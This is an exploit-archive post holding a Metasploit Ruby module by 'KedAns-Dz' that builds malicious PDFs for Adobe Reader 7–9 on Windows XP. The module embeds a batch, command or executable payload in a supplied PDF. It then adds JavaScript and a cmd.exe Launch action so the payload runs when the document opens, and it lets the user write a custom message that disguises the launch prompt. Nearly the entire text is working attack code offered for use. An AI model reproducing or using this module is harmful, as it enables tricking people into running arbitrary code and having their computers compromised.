ExploitFixes
[D] Adobe (pdf) Immixing Cmd-Bat file [Z] 2011-02-18 18:52:50
Inviato da: kedans

========================================================================================
| # Title : Adobe (pdf) Immixing Cmd/Bat file |
| # Author : KedAns-Dz |
| # email : [email protected] |
| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) |
| # Web Site : /(~_-)\ ... |
| # Add on MSframwork all versions : ../windows/fileformat/adobe_pdf_imixing_cmd.rb |
| # Tested on : windows XP SP3 Français & Arabic |
| # Target SFW : Adobe Reader 7.x 8.x 9.x ... |
| # Info : you are can sending the Batch file or command file format as PDF file |
====================== Exploit By KedAns-Dz =================================
# Ruby File (on MetaSploit fw) :
----------------------------------

##
# $ Id: adobe_pdf_immixing_cmd.rb // 2011-02-11 17:23:19 ; KedAns-Dz $
##

##################
# This module is Developer on 'windows/fileformat/adobe_pdf_embedded_exe'. Info :
# you are can sending the Batch file or command file format as PDF file,
# Provided by KedAns-Dz < algerian HaCker > GreeTz to : Mr.Dak007 + Islampard .
##################

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::PDF_Parse
include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe PDF Immixing BAT/CMD File ',
'Description' => %q{
This module is Developer on : 'windows/fileformat/adobe_pdf_embedded_exe'. Info :
you are can sending the Batch file or command file format as PDF file,
Provided by KedAns-Dz < algerian HaCker > GreeTz to : Mr.Dak007 + Islampard .
},
'License' => MSF_LICENSE,
'Author' =>
[
'KedAns-Dz <ked-h(at)hotmail(dot)com>', # initial module
' [D] HaCkerS-StreeT-Team [Z]' ,
],
'Version' => '0.1.0.2',
'Payload' =>
{
'Space' => 1500,
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'Windows',
'Targets' =>
[
[ 'Adobe Reader v7.x, v8.x, v9.x (Windows XP SP2/SP3 FR & AR)', { 'Ret' => '' } ]
],
'DefaultTarget' => 0))

register_options(
[
OptString.new('INFILENAME', [ true, 'The Input PDF filename.']),
OptString.new('BCNAME', [ true, 'The Name of payload BAT or CMD File.']),
OptString.new('FILENAME', [ true, 'The output filename.', 'evil.pdf']),
OptString.new('OUTPUTPATH', [ true, 'The location to output the file.', './data/exploits/']),
OptString.new('MESSAGE', [ true, 'message to display :',"< Enter You are message here > "]),
], self.class)
end

def exploit

file_name = datastore['INFILENAME']
ked_name = datastore['BCNAME']

print_status("Reading in '#{file_name}'...")
stream = read_pdf()
print_status("Parsing '#{file_name}'...")
pdf_objects = parse_pdf(stream)
print_status("Parsing Successful.")
xref_trailers = pdf_objects[0]
trailers = pdf_objects[1]
startxrefs = pdf_objects[2]
root_obj = pdf_objects[3]

output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,ked_name,startxrefs.last)

print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(output)
end


def ef_payload(pdf_name,payload_cmd,obj_num)

if !(payload_cmd and payload_cmd.length > 0)
print_status("Using '#{datastore['PAYLOAD']}' as payload...")

payload_cmd = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
file_size = payload_cmd.length
stream = Rex::Text.zlib_deflate(payload_cmd)
md5 = Rex::Text.md5(stream)

else
print_status("Using '#{datastore['BCNAME']}' as payload...")

file_size = File.size(payload_cmd)
stream = Rex::Text.zlib_deflate(IO.read(payload_cmd))
md5 = Rex::Text.md5(File.read(payload_exe))

end

output = String.new()

output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r"


return output
end

def js_payload(pdf_name,obj_num)

output = String.new()
output << "#{obj_num.to_i + 3} 0 obj\r<</S/JavaScript/JS(this.exportDataObject({ cName: \"#{pdf_name}\", nLaunch: 0 });)/Type/Action>>\rendobj\r"
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C "

# change to the home drive/path no matter what
output << "%HOMEDRIVE%&cd %HOMEPATH%"

# check for the pdf in these dirs, in this order..
dirs = [ "Desktop", "My Documents", "Documents" ]
dirs.each { |dir|
fmt = "&"+
"("+
"if exist \"%s\" "+
"(cd \"%s\")"+
")"
fname = "%s\\\\#{pdf_name}.pdf" % dir
output << fmt % [fname, dir]
}
launch_message = datastore['MESSAGE']
lines = []
launch_message.gsub(/.{1,80}(?:\s|\Z)/) { lines << $& }
if (lines.length > 2)
print_status("Warning: the MESSAGE is more than 2 lines. It may not display correctly.")
end

output << "&"+
# note: the following doesn't work with spaces, and adding quotes doesn't execute the payload :-/
"(start #{pdf_name}.pdf)"+
# note: The below message modifies the text in the "File:" textfield of the "Launch File" dialog
("\n"*10) +
launch_message+
# note: this extra rparen is required.
")"+
">>>>\rendobj\r"

return output

end


def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,ked_name,startxref)

file_name = file_name.split(/\//).pop.to_s

match = file_name.match(/(.+)\.pdf/)
if match
pdf_name = match[1]
end

catalog = parse_object(xref_trailers,root_obj,stream)


match = catalog.match(/Names (\d+ \d) R/m)
if match

names = parse_object(xref_trailers,match[1],stream)
match = names.match(/EmbeddedFiles (\d+ \d) R/m)
if match
embedded_files = parse_object(xref_trailers,match[1],stream)
new_embedded_files = embedded_files.gsub(/(\]>>)/m,"(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{trailers[0].fetch("Size")} 0 R" + '\1')
else
new_names = names.gsub(/(>>.*)/m,"/EmbeddedFiles #{trailers[0].fetch("Size")} 0 R" + '\1')
end

else
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/Names #{trailers[0].fetch("Size")} 0 R")
end

if catalog.match(/OpenAction/m)

match = catalog.match(/OpenAction (\d+ \d) R/m)
if match
open_action = "#{match[1]} R"

if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
elsif new_names
new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
else
new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end
else
if new_embedded_files
new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
elsif new_names
new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
else
new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end

end
else
if new_catalog
new_catalog = new_catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
else
new_catalog = catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
end
end
else
if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
elsif new_names
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
else
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end

else
if new_embedded_files
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
elsif new_names
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
else
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end
end
end



pages_obj = catalog.match(/Pages (\d+ \d) R/m)[1]
pages = parse_object(xref_trailers,pages_obj,stream)

page_obj = pages.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)[1]
page = parse_object(xref_trailers,page_obj,stream)

match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
while match

page_obj = match[1]
page = parse_object(xref_trailers,page_obj,stream)
match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
end

match = page.match(/AA<<\/O (\d+ \d) R/m)
if match
aa = parse_object(xref_trailers,match[1],stream)
end


new_pdf = String.new()
xrefs = String.new()


if new_embedded_files
pdf_payload = String.new()
num = trailers[0].fetch("Size").to_i - 1
pdf_payload << ef_payload(pdf_name,ked_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload

xrefs = xref_create(new_pdf,stream.length,"*")

new_size = trailers[0].fetch("Size").to_i + 4

if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d R(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 3} 0" + '\2')
else
new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 3} 0 R>>" + '\1')
end

new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")

new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")

new_pdf << new_embedded_files
xrefs << xref_create(new_pdf,(new_pdf.length - new_embedded_files.length), "1")

if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n"
end

new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_embedded_files.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"

elsif new_names
pdf_payload = String.new()
num = trailers[0].fetch("Size").to_i
pdf_payload << "#{num} 0 obj\r<</Names[(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,ked_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload

xrefs = xref_create(new_pdf,stream.length,"*")

new_size = trailers[0].fetch("Size").to_i + 5

if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 4} 0" + '\2')
else
new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 4} 0 R>>" + '\1')
end

new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")

new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")

new_pdf << new_names
xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1")

if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n"
end

new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"


else
pdf_payload = String.new()
num = trailers[0].fetch("Size").to_i + 1
pdf_payload << "#{trailers[0].fetch("Size")} 0 obj\r<</EmbeddedFiles #{num} 0 R>>\rendobj\r"
pdf_payload << "#{num} 0 obj\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,ked_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")

new_size = trailers[0].fetch("Size").to_i + 6

if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 5} 0" + '\2')
else
new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 5} 0 R>>" + '\1')
end

new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")

new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")

if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
new_pdf << "xref\r\n" << xrefs
new_pdf << "trailer\r\n"
new_pdf << "<</Size #{new_size}/Prev #{startxref}"
new_pdf << "/Root #{trailers[0].fetch("Root")} R"
new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n"
end

new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"


end


return new_pdf
end
end

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends .. |
#------------------------------------------------------------------------------|